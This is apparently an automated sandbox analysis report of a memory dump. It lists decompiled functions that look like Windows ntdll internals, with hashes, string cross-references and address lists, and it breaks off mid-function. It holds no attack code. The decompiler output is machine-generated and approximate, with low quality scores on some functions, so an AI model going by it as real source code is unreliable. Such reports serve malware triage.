Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: d0ecf795fc8a719e071d1d136db3fe12181aab2da0fe2febdfb0ff9ef367595c
Instruction ID: 514971226f8a24e5226fceb97b1a148f3ad8e53bedb08885d726dcce740dc508
Opcode Fuzzy Hash: d0ecf795fc8a719e071d1d136db3fe12181aab2da0fe2febdfb0ff9ef367595c
Instruction Fuzzy Hash: 364157F2D0052DABDB21DB50DC85FEEB77CAB54714F0085A5EA09A7280DB319E88CF94

Uniqueness

Uniqueness Score: -1.00%

Function 050905AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E050905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E050907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E05009730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0508A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0508A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E05091293(_t79, _v40, E050907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04FE7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0508138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x050905c5
0x050905ca
0x050905d3
0x050906db
0x050906db
0x050906dd
0x050906e3
0x050906e3
0x050905dd
0x050905e7
0x050905f6
0x05090600
0x05090607
0x05090610
0x05090615
0x0509061a
0x0509061c
0x0509061e
0x05090624
0x05090625
0x05090627
0x05090628
0x05090631
0x05090640
0x0509064d
0x05090654
0x05090654
0x05090631
0x0509066d
0x05090674
0x00000000
0x00000000
0x05090692
0x0509069e
0x050906b0
0x050906a0
0x050906a9
0x050906a9
0x050906b8
0x050906d6
0x050906d6
0x00000000

Strings

`, xrefs: 05090633

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 819f5327b2a31a03792fbd5c5722a08b7ce0793e9e16caf42e00e34ef12c39e8
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 48310032708345ABEB24DE26DD88F9AB7D9BBC4754F044229F949DB2C4D770E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05043884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05043884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E05009650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04FE4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E05009650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x05043893
0x05043896
0x05043899
0x0504389f
0x050438a0
0x050438a4
0x050438a9
0x050438ac
0x050438ad
0x050438ae
0x050438af
0x050438b1
0x050438b4
0x050438bb
0x050438bc
0x050438bd
0x050438c4
0x050438c8
0x050438ca
0x050438ca
0x050438d5
0x0504393e
0x05043940
0x05043942
0x05043952
0x05043954
0x05043961
0x05043961
0x05043967
0x0504396e
0x0504396e
0x05043947
0x0504394c
0x00000000
0x0504394c
0x050438ea
0x050438ee
0x050438f8
0x050438f9
0x050438ff
0x05043900
0x05043902
0x05043903
0x0504390b
0x0504390f
0x05043950
0x00000000
0x05043950
0x05043915
0x0504391d
0x0504391d
0x05043922
0x05043926
0x00000000
0x05043928
0x0504392b
0x0504392b
0x05043935
0x05043937
0x05043937
0x00000000
0x05043935
0x05043926
0x050438f0
0x00000000

Strings

BinaryName, xrefs: 050438B4

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: a5a42fd048fde1d7030b3a426b1b4542040a79944b760c30ce1de9c8e631c3e4
Instruction ID: 6ea054c5ee258ad5120199eccba05e400e182c398ad4fd72c0ca9b4f0e3b366d
Opcode Fuzzy Hash: a5a42fd048fde1d7030b3a426b1b4542040a79944b760c30ce1de9c8e631c3e4
Instruction Fuzzy Hash: 6D3105B290450ABFEB16DA58D945DBFF7B5FB80B20F014979E805A7280D731DE80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04FFD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E04FFD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x50bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04FE4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0500B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E050098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E050095D0();
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x04ffd29c
0x04ffd2a6
0x04ffd2b1
0x04ffd2b5
0x04ffd2b6
0x04ffd2bc
0x04ffd2bd
0x04ffd2be
0x04ffd2bf
0x04ffd2c2
0x04ffd2c4
0x04ffd2cc
0x04ffd384
0x04ffd34b
0x04ffd34f
0x04ffd350
0x04ffd351
0x04ffd35c
0x04ffd35c
0x04ffd2d6
0x04ffd2da
0x04ffd2e1
0x04ffd361
0x04ffd369
0x04ffd36d
0x04ffd2e3
0x04ffd2e3
0x04ffd2e3
0x04ffd2e5
0x04ffd2ed
0x04ffd2f5
0x04ffd2fa
0x04ffd302
0x04ffd303
0x04ffd30b
0x04ffd30f
0x04ffd313
0x04ffd318
0x04ffd31c
0x04ffd320
0x04ffd379
0x04ffd37d
0x00000000
0x00000000
0x0503affe
0x0503b001
0x0503b011
0x00000000
0x04ffd322
0x04ffd322
0x04ffd330
0x04ffd337
0x04ffd35d
0x04ffd339
0x04ffd33f
0x04ffd38c
0x04ffd38c
0x04ffd33f
0x04ffd349
0x00000000
0x04ffd349

Strings

@, xrefs: 04FFD303

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 7480ac4608a2faaeda7da110b82b19801c7b2c94cdc25c9f9e7ed4f2b6bd0e65
Instruction ID: e230941d6ff012b8e82b71840fa327c9c8684c0ff0cbbf12f4118f68166b8cd4
Opcode Fuzzy Hash: 7480ac4608a2faaeda7da110b82b19801c7b2c94cdc25c9f9e7ed4f2b6bd0e65
Instruction Fuzzy Hash: F03195726083059FD711DF28DD8096FBBE8EF85754F00092EF69583260E639ED06DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04FD1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04FD1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0500BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0500A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0500A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04FE4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x04fd1b8f
0x04fd1b9a
0x04fd1b9c
0x04fd1b9e
0x04fd1ba3
0x05027010
0x05027010
0x00000000
0x04fd1ba9
0x04fd1ba9
0x04fd1bae
0x00000000
0x04fd1bc5
0x04fd1bca
0x04fd1bcf
0x04fd1bd0
0x04fd1bd1
0x04fd1bd2
0x04fd1bd6
0x04fd1bdc
0x04fd1be0
0x05026ffc
0x05027000
0x00000000
0x05027006
0x05027009
0x05027009
0x04fd1be6
0x04fd1bec
0x04fd1c0b
0x04fd1c0b
0x04fd1c0c
0x04fd1c11
0x04fd1c12
0x04fd1c15
0x04fd1c1b
0x04fd1c1f
0x04fd1c31
0x04fd1c33
0x05027026
0x05027026
0x04fd1c21
0x04fd1c24
0x04fd1c24
0x04fd1bee
0x04fd1bee
0x04fd1bf2
0x04fd1c3a
0x04fd1bf4
0x04fd1bf4
0x04fd1c05
0x04fd1c05
0x04fd1c09
0x04fd1c3e
0x00000000
0x00000000
0x00000000
0x04fd1c09
0x04fd1bec
0x04fd1be0
0x04fd1bae
0x04fd1c2e

Strings

WindowsExcludedProcs, xrefs: 04FD1BC5

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: ec5f6af0499c8418b19e227fdffd1d003954bb652b3a0627c1b7f17c6ed56e0d
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 0A21C577B01228EBDB21AA559A84FAFB7AEEF41750F094425F9059B200D630ED02D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04FEF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FEF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x04fef71d
0x04fef722
0x04fef726
0x05034770
0x04fef765
0x04fef769
0x04fef769
0x04fef732
0x0503477a
0x00000000
0x0503477a
0x04fef738
0x04fef73a
0x04fef73c
0x04fef73f
0x04fef746
0x04fef778
0x04fef7a9
0x04fef7a9
0x04fef754
0x04fef75a
0x04fef75d
0x04fef75f
0x04fef761
0x04fef76f
0x04fef771
0x04fef771
0x04fef76f
0x04fef763
0x00000000
0x04fef763
0x04fef77d
0x04fef7a3
0x04fef7a5
0x00000000
0x04fef7a5
0x04fef77f
0x04fef782
0x04fef784
0x04fef786
0x00000000
0x00000000
0x00000000
0x04fef788
0x04fef748
0x04fef74d
0x04fef78d
0x04fef793
0x04fef7b7
0x04fef7bc
0x00000000
0x04fef7bc
0x04fef798
0x00000000
0x00000000
0x04fef79d
0x04fef7b0
0x00000000
0x04fef7b0
0x04fef79f
0x00000000
0x04fef74f
0x04fef74f
0x00000000
0x04fef74f

Strings

Actx , xrefs: 04FEF73F

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: c4e2c3bdde4473b5f4242d577b3ede9cc07fdad24561d178c93d2d1f10e9677d
Instruction ID: cccab2c62ad2545ccf8d117808f1544948362ecd6382e246eab9db9e217b0274
Opcode Fuzzy Hash: c4e2c3bdde4473b5f4242d577b3ede9cc07fdad24561d178c93d2d1f10e9677d
Instruction Fuzzy Hash: B211B636B04602ABEB244E1F859073676D6EB85726F25452AE865CB391E770F8438360

Uniqueness

Uniqueness Score: -1.00%

Function 05078DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E05078DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x50a0d50);
				E0501D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E05055720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0501DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0501DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0501D130(_t34, _t39, _t40);
			}

0x05078df1
0x05078df1
0x05078df1
0x05078df1
0x05078df1
0x05078df1
0x05078df3
0x05078df8
0x05078dfd
0x05078e00
0x05078e0e
0x05078e2a
0x05078e36
0x05078e38
0x05078e3c
0x05078e46
0x05078e46
0x05078e36
0x05078e50
0x05078e56
0x05078e59
0x05078e5c
0x05078e60
0x05078e67
0x05078e6d
0x05078e73
0x05078e74
0x05078eb1
0x05078ebd

Strings

Critical error detected %lx, xrefs: 05078E21

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: c91eb0dc44a114aa0ed5c58b8f0a4cbee43fa006b4e2ed4a574fb10315d01d60
Instruction ID: 5242b6dc548d609427c32067966a585f5342b4da80e075905fd5625d8285bd41
Opcode Fuzzy Hash: c91eb0dc44a114aa0ed5c58b8f0a4cbee43fa006b4e2ed4a574fb10315d01d60
Instruction Fuzzy Hash: E51179B6D04348EADB24DFA4A9097DCBBB1BF04310F24821DE4296B282C3340602CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0505FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0505FF60

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 51911d0c464833cf24e1a5c276c491dc09f72c914216404be2441c64486a253b
Instruction ID: 8acfd20c54cba560c0e0f3b5078924cf426b59b479ca7dcefa1d3ab7e86f18f0
Opcode Fuzzy Hash: 51911d0c464833cf24e1a5c276c491dc09f72c914216404be2441c64486a253b
Instruction Fuzzy Hash: 3011CEB2610184EFDB12DB50ED8AFDDBBB1FF08724F148444F9096A6A0C73C9940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05095BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E05095BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x50a1178);
				E0501D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05094C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0500D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05095542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x50b60e8;
								if( *0x50b60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x50b60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E05009710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
